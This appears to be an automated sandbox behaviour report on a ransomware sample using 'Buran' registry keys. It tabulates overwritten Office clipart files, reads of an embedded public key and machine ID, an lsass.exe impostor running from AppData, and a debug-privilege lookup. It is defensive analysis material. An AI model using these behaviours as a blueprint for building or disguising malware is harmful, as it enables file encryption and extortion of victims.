| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00076_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00077_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00086_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00096_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00296_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00306_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00336_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00361_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00369_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00397_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00403_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00414_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00419_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00428_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00435_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00438_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00459_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00543_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00564_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00586_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00775_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00779_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00799_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00814_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00965_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01074_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01074_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01074_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01074_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01176_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01191_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01196_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01548_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01657_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01658_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01659_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01660_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02068_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02075_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02088_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02097_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02115_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02116_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02141_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02161_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FLAP.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FLAP.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FLAP.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FLAP.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRDEN_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00231_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00235_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00236_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00241_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00334_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00443_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00513_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00524_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00526_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00527_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00546_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00601_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00612_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00623_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00625_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00681_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00687_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00688_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00693_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01013_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01058_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01065_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01080_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01242_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01329_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01461_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01618_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01759_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01923_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02155_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02282_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02298_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02312_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02313_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00005_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00114_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00116_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00172_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF | size = 1 |
|
2 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF | size = 1024 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF | size = 4 |
|
3 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF | size = 188 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF | size = 1268 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HTECH_01.MID | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00046_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00177_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00204_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00233_.WMF | size = 1 |
|
1 | |
| Write | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF | size = 1 |
|
1 | |
|
For performance reasons, the remaining 3001 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (8856)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran\Service | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
771 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
859 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
259 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
11 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
22 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
22 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
275 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
226 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1239 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
40 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
375 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
280 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran\Service | value_name = Public Key, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran\Service | value_name = Public Key, data = V/L+XRZkl9zExa+qoOeEkbNDK8rDu+DlL03CJxFRDz0Kt+/sPii6C3FSQOgFlJ85tLJ7pe0EN/V6lZWfTK3Ekovfmz7UbpkuE5mAaGNefyGR+fkowGOQ2NEiLtX8wcr8UWRHhFiahywIkxzugPvfxDEh5MfKhmMRfgzj07Ay3o5p0N4blFNJj2gM5zwT0Ktz7tohHn0VK+3zrY+AcqmyV+W5/OiC02ERW9Xjq+GintxXB+Wt2+oInu/DlY5na8g49dua77uOF6RpaRss8T7FQ117eESTqhSFW/68PPntOjizGewEEeKC/dj2bR0TV+D98ngbhaz4GVmqu6jUemQt+x8K1lcfJvrMEi7HhbAglZY/wPY7bLrnibmgTTajvFlFin33prrPTyxQx8e6oLLpDNkc, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran\Service | value_name = Machine ID, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran\Service | value_name = Machine ID, data = 05B9EUkaPIPnR1j5OPrQtbnRpFTan+HGf+D/AH6BSanSBo6n5XvhlPegiZnPIXGhqvhJGPFvOBX4N05R6qhojtOX+9d1bFZJZOFE2oODRXd+55dVf7MOFpQsWWS495ffu1HjmMgHLJQpnhMMwMqO/mIXCuw1qBz8D3HtXOb5/OMI+6JxaqZd8AhosM/pPYAU3MdMVNXBvoTJDK8uavJMjKNIsQNpka93n4YtkfxPwL2/rMuUu4V2tDeH6on+pMyXw0YTAQfRYVGHx8JpngRbUaGYbMPPTjHXi+oR0+P79b5Zi5IMH3sHnLjifDoiZIMWbWWZFTf/yT1GeiIE+VVHhGuIiErfLast3u8OF9nKlquV/YH041SbW/P+B5QCDGFvgLSEsVj/B+yelAyd03dzELfWbI9yiv0AKCeVHRpWyN3F6jHJXFs/2JM1LVo57qwP+gBLCF87BbuM10BeSGTW+pbUVDDEaUOx5TLAY1YJYoGKPfgUUM13/j/fx9qO1QCiJ+LuT4f0FXB5buJA5mcQ3S1ZWB187kpSpcL1TptQaQLgEEi/pj8Icdq9F95Igw1MuTq4jL7To8bUkM28yK75UlH15E5wLUPrHHGbiZECUHYh989g7Cj942XwkRfLu7Q8XHrZ5hrTrxTTPvWFz1b2vo7ClEmjhkRRZWKBHjQN8HAeKfV3EvJKw9xyUyF1nfuuefuNu9qqolIECdtsYbhHN/kTnG3fZv98U0oKRdG/SZebyuRFxMJv2t3gbEUwExGlBg6TxHqIoWMXP6k53Pi0WTmkf+kVAMuGoAnnXWikBYTKoaT/Ddt7YTtUEfx+aTyrRJ2ovZwxaqYS7zCmz8et5Q1joirtqtkccqcbZjDrc+fXcnMRuP9AiQI1IxJAPco5JjZo6XPAl7Y9qm4NkHEOWniOEAF/FbkHaatonc4atDuIJvMAiJXqzmGrNeHRLhdHoz09xMAWrhnNVT26xKPtpNyPihmiX8KZInO1/Mwz4XThC4PrIvNVvIKKdBfc31Nn2RZ4tR5VSH2sVL9fhjA5sihIIwHK8JSXVj8P9V7urpCHDJcqO+hMyCB6cM1Yz25nCTWfXKmaz6XJbKWTbMC7qj2ggkuWY/Mfs7RLXo8RzHASVsXaBl6Z2hZQ3L9BqlCwNvyfVy15c2u9TXmh1uZjN0+zMocvIBR/mMQMMMK5/aqvhUQ0gCOqRStsNP8OH3+m1O2u+OsYvrEH5iHpxscQN5LMJp2hUAgXX3YsTMEYbm87hSdsgY6jc/G9mks1dHrIAX696FzvP0SLRfmGnlfseEQxLmsLQ4FE678Tu0oqkCht4aLuQKm531Xak8YybHP8VSxPicanhtoYR0AZqB73oDX1TfHjJztEW/O2TfIYqQ0NpT6V/YwFjSzo8VL+hycwEK751HM8v7AUX4aDlRgJsXz6I4tiTYXD5P4EQ5DRAsX46fm8bRQpq/DlShhiWUqcHiO9cMEAtv4SUcBo3l8fJhLWEEGo/hyh1jIPR/Ne598HJWDMhQBL4NjkY/Q1Y+ZfhLsgUY/QoZI0yUea9By5CBAAqyR3Vrqx1Rhb0/clbmH1H0JkTVkppUmxCS+cKifJovYw9JYBNYTyFvqck7hIJ8DHXHohfHM4Q006vUoe180dF5/7ofSEBzVu7OAT1suXINoZYjqiCCEM/c/6LFEwdpxCMbA7u9wr45PM7Tm26o9vBY1Z5X8x37zu1f043o5E1UCuYA==, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Knock, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Knock, data = 666, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
771 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
4 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
859 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
259 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
4 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
8 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
11 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
22 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
5 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
22 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
5 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
275 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
226 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1239 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
40 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
375 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
280 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | notepad.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (32)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.ENU | base_address = 0x0 |
|
1 | |
| Load | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe | base_address = 0xc00000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76ad0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75d30000 |
|
1 | |
| Get Filename | c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe | process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
1 | |
| Get Filename | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN | process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExA, address_out = 0x76b6434f |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x75d34c28 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x75dac802 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x75daec66 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75d55934 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x75dad332 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x75dadbd4 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x75dae405 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x75daf00a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x75daf15e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75d55a98 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x75daecfa |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x75daee2e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x75d4b0dc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75d46fab |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x75d501a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x75d4699e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75d56ba7 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75d76c12 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x75d4dbd1 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75d57fdc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75d47a2a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75d50355 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 0, result_out = 4 |
|
1 |
System (4439)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
5 | |
